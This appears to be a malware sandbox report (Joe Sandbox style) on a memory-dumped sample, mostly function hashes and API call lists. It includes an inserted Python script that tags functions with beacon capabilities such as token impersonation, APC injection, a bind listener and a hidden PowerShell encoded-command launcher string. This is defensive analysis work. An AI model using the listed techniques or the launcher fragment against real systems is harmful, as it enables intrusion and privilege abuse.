                                            • Instruction Fuzzy Hash: 00110835618798C2EA24AF11E81571AB360F788FE0F44476DEE9947BA4CF7CD5058704
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: %s!%s
                                            • API String ID: 0-2935588013
                                            • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                            • Instruction ID: c42a10603597eb65e1a4646ba455f14b1a0127e8f4b6f175fb872722745a3cd2
                                            • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                            • Instruction Fuzzy Hash: 05514676205680C6DB34AF66D4447E97361F789B98F948026EF8A57748EB3CED82CB04
                                            APIs
                                            • LookupPrivilegeValueA.ADVAPI32 ref: 007C0BEA
                                            • AdjustTokenPrivileges.ADVAPI32 ref: 007C0C1A
                                            • GetLastError.KERNEL32 ref: 007C0C24
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                            • String ID: %s
                                            • API String ID: 4244140340-620797490
                                            • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                            • Instruction ID: bb615955f9b21ad6a9fa2d1a6f3f61ca6a5a5ec412e6a723fab3e69bbacc8dda
                                            • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                            • Instruction Fuzzy Hash: A6216B72B00B44DAEB14DFA5D448BEC33B5F758B88F44455A8E4C93A49EF78C615C380
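The blocks above each describe one recovered function by the Win32 calls it makes (CreateProcessWithTokenW/CreateProcessAsUserA, LogonUserA plus ImpersonateLoggedOnUser, LookupPrivilegeValueA plus AdjustTokenPrivileges, GetProcAddress of NtQueueApcThread next to Thread32Next, socket/bind/listen), and that co-occurrence is what tells a reader which post-exploitation features the payload carries. The following is an added example, not part of the report: it parses blocks in this page's format and labels them by capability. REPORT_EXCERPT is a condensed, constructed copy of six blocks from this page keeping only the fields the parser reads; the capability labels and the rules behind them are this example's own, not labels the report assigns.

```python
"""Parse the report's per-function blocks and map them to beacon capabilities.

Added example, not part of the report. Each block lists the Win32 APIs a recovered
function calls, an 'API ID' made of concatenated API-name fragments, a 'String ID'
and an Opcode ID. Which calls co-occur in one function is a quick way to inventory
post-exploitation features. REPORT_EXCERPT is a condensed, constructed copy of six
blocks from this page (only the fields the parser needs); the capability labels
are this example's own mapping, not labels the report assigns.
"""
import re
from typing import Callable, Dict, List

REPORT_EXCERPT = """\
APIs
• CreateProcessAsUserA.ADVAPI32 ref: 007C0F8F
• CreateProcessWithTokenW.ADVAPI32 ref: 007C13D1
• API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
• String ID:
• Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
• Instruction Fuzzy Hash: 5C61AB32608B84C2EB24DF61E884B6A73A5F749B84F50413DEA4D83B56DF7CC995CB40
APIs
• GetProcAddress.KERNEL32 ref: 007C3ADE
• CreateToolhelp32Snapshot.KERNEL32 ref: 007C3B10
• Thread32Next.KERNEL32 ref: 007C3B7A
• String ID: NtQueueApcThread$ntdll
• Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
• Instruction Fuzzy Hash: 16415A72705B4199EB20CF61E844B9D73A5BB48B88F54812DDE4D57B08EF3CCA45C740
APIs
• API ID: bindclosesockethtonsioctlsocketlistensocket
• Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
• Instruction Fuzzy Hash: 2F11007170879882DB248F16E49071DB7A0F788FA4F98867DDE5A537A4CF7CE84A8700
APIs
• LogonUserA.ADVAPI32 ref: 007CDF98
• ImpersonateLoggedOnUser.ADVAPI32 ref: 007CDFC0
• String ID: %s\\%s
• Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
• Instruction Fuzzy Hash: 2A314F20B18B45C2EB20EB62F89976A23A6F789BC0F54403DEA4E47756DF3CD945C740
APIs
• LookupPrivilegeValueA.ADVAPI32 ref: 007C0BEA
• AdjustTokenPrivileges.ADVAPI32 ref: 007C0C1A
• Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
• Instruction Fuzzy Hash: A6216B72B00B44DAEB14DFA5D448BEC33B5F758B88F44455A8E4C93A49EF78C615C380
APIs
• _snprintf.LIBCMT ref: 00777166
• String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
• Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
• Instruction Fuzzy Hash: 6C32A562618E8592DF268B2DE0052E9A3B0FF997D9F449501DF8D17B25EF3CD2A6C340
"""

# "• Name.MODULE ref: ADDR", with or without the "Part of subcall function" prefix
API_RE = re.compile(r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?(\w+)\.\w+ ref: [0-9A-F]+")
FIELD_RE = re.compile(r"•\s*(API ID|String ID|Opcode ID|Instruction Fuzzy Hash):\s*(.*)")


def parse_blocks(text: str) -> List[Dict]:
    """Split report text into blocks; a block ends at its Instruction Fuzzy Hash line."""
    blocks, cur = [], {"apis": [], "fields": {}}
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            cur["apis"].append(m.group(1))  # direct calls and subcall calls alike
            continue
        m = FIELD_RE.match(line)
        if m:
            cur["fields"][m.group(1)] = m.group(2).strip()
            if m.group(1) == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur = {"apis": [], "fields": {}}
    return blocks


# label -> predicate over one parsed block (this example's own mapping)
CAPABILITY_RULES: Dict[str, Callable[[Dict], bool]] = {
    "run_as_token": lambda b: bool({"CreateProcessWithTokenW", "CreateProcessAsUserA"} & set(b["apis"])),
    "make_token": lambda b: {"LogonUserA", "ImpersonateLoggedOnUser"} <= set(b["apis"]),
    "getprivs": lambda b: {"LookupPrivilegeValueA", "AdjustTokenPrivileges"} <= set(b["apis"]),
    "apc_inject": lambda b: "NtQueueApcThread" in b["fields"].get("String ID", "") and "Thread32Next" in b["apis"],
    "bind_listener": lambda b: all(k in b["fields"].get("API ID", "").lower() for k in ("socket", "bind", "listen")),
    "powershell_launcher": lambda b: "-EncodedCommand" in b["fields"].get("String ID", ""),
}


def classify(blocks: List[Dict]) -> Dict[str, List[str]]:
    """Map the first 16 hex digits of each Opcode ID to the capability labels it matches."""
    return {
        b["fields"].get("Opcode ID", "?")[:16]: [name for name, rule in CAPABILITY_RULES.items() if rule(b)]
        for b in blocks
    }


def capabilities(text: str) -> List[str]:
    """All capability labels present anywhere in the report text, sorted."""
    return sorted({label for labels in classify(parse_blocks(text)).values() for label in labels})


if __name__ == "__main__":
    for opcode_id, labels in classify(parse_blocks(REPORT_EXCERPT)).items():
        print(opcode_id, labels or "-")
```

Keying the output on the Opcode ID is deliberate: that hash is stable across samples built from the same beacon code, so a label table produced once can be reused to triage the next report by matching Opcode IDs before reading a single block. The API ID field is used only where a block lists no call sites (the listener block), because its concatenated fragments lose call order and module names.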
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 007C587B
                                            • Sleep.KERNEL32 ref: 007C58CA
                                            • GetTickCount.KERNEL32 ref: 007C58D0
                                            • WSAGetLastError.WS2_32 ref: 007C58DA
                                              • Part of subcall function 007C5A20: ioctlsocket.WS2_32 ref: 007C5A42
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$ErrorLastSleepioctlsocket
                                            • String ID:
                                            • API String ID: 1121440892-0
                                            • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                            • Instruction ID: 054467d323e36cce02eb180a72a40793fc18fed136aafd4b618d6b5eb0f281e1
                                            • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                            • Instruction Fuzzy Hash: BC318836B00F40C6DB00DBA2E8847AC33B9F388B90F51462ADE5E93B95DE39C556C340
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $<$ailure #%d - %s$e '
                                            • API String ID: 0-963976815
                                            • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                            • Instruction ID: 287bb5dc15f92eb6a27f88c67edb15b167955f2ef760f6903e2caa1b01a9c48e
                                            • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                            • Instruction Fuzzy Hash: D992D2B2729A8087DB58CB1DE4A173AB7A1F3C8B84F44512AE79B87794CE3CD551CB04
                                            APIs
                                              • Part of subcall function 007C6114: htonl.WS2_32 ref: 007C6131
                                            • GetLastError.KERNEL32 ref: 007BDD33
                                              • Part of subcall function 007CCC00: GetCurrentProcess.KERNEL32 ref: 007CCC8D
                                            • HeapCreate.KERNEL32 ref: 007BDCDA
                                            • HeapAlloc.KERNEL32 ref: 007BDCF8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                                            • String ID:
                                            • API String ID: 3419463915-0
                                            • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                            • Instruction ID: 93d0b362698dc65198dd26153f504d09491addcac283598cc59bf01dd77d395c
                                            • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                            • Instruction Fuzzy Hash: 91E180B2B10B4187EB34CB25E8457AA63A1F758794F498139DB8E97B51EF3CE546C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: signal
                                            • String ID:
                                            • API String ID: 1946981877-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $<
                                            • API String ID: 0-428540627
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ailure #%d - %s$e '
                                            • API String ID: 0-4163927988
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ZKv
                                            • API String ID: 0-880881843
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ZKv
                                            • API String ID: 0-880881843
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ZKv
                                            • API String ID: 0-880881843
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ZKv
                                            • API String ID: 0-880881843
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ZKv
                                            • API String ID: 0-880881843
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                                            • Instruction ID: 1df5ddff5bd793e948fa5e9961ea76d0132f60b4744e8db752e6bbfcaa088167
                                            • Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                                            • Instruction Fuzzy Hash: 7DC012DBE1FEC04AF32382690C7A42E2EA494FB91030E608ACF8402293A14E0C225261
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                                            • Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
                                            • Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                                            • Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                                            • Instruction ID: e1caecb6445a2499f8d0cd7f9dcdff8d8002f52e01be10325dabbee32111e1e2
                                            • Opcode Fuzzy Hash: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                                            • Instruction Fuzzy Hash: 8390025650E3C009CA03D6241C601083F60B08290038B408B838042BC3D44C0508C322
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: acceptioctlsocket$closesockethtonlselect
                                            • String ID:
                                            • API String ID: 2003300010-0
                                            • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                            • Instruction ID: bb128c0f82dcfd230e73372f997504decf17c4317679c195ce761b72f2b1ae07
                                            • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                            • Instruction Fuzzy Hash: 89919B72610A91DBDB20DF25E984BAD33B5F788798F40412AEB4D87B58DF38D665CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                                            • String ID: %s%s$*/*
                                            • API String ID: 3787158362-856325523
                                            • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                            • Instruction ID: dc4d12832121c8273b3fb7dd9a449dd0ff8499d6d7d883b4795c3e38b8ecfd70
                                            • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                            • Instruction Fuzzy Hash: D5719932708B85CAEB10DF65E8847E977A1F398B88F44012AEA4E43769DF7CD50AC740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                                            • String ID:
                                            • API String ID: 34948862-0
                                            • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                            • Instruction ID: e44228b2950c57fae51fd6f4e9e2329dfcd5e69ff83efca01a76b2675d86cd15
                                            • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                                            • Instruction Fuzzy Hash: 51417A32704F44C6EB10DB61E858BAD336AF788BA4F544228DE2E57BA5DF3DD4968700
                                            APIs
                                            • _errno.LIBCMT ref: 007CFE36
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007CFE42
                                            • __crtIsPackagedApp.LIBCMT ref: 007CFE53
                                            • AreFileApisANSI.KERNEL32 ref: 007CFE62
                                            • MultiByteToWideChar.KERNEL32 ref: 007CFE88
                                            • GetLastError.KERNEL32 ref: 007CFE95
                                            • _dosmaperr.LIBCMT ref: 007CFE9D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1138158220-0
                                            • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
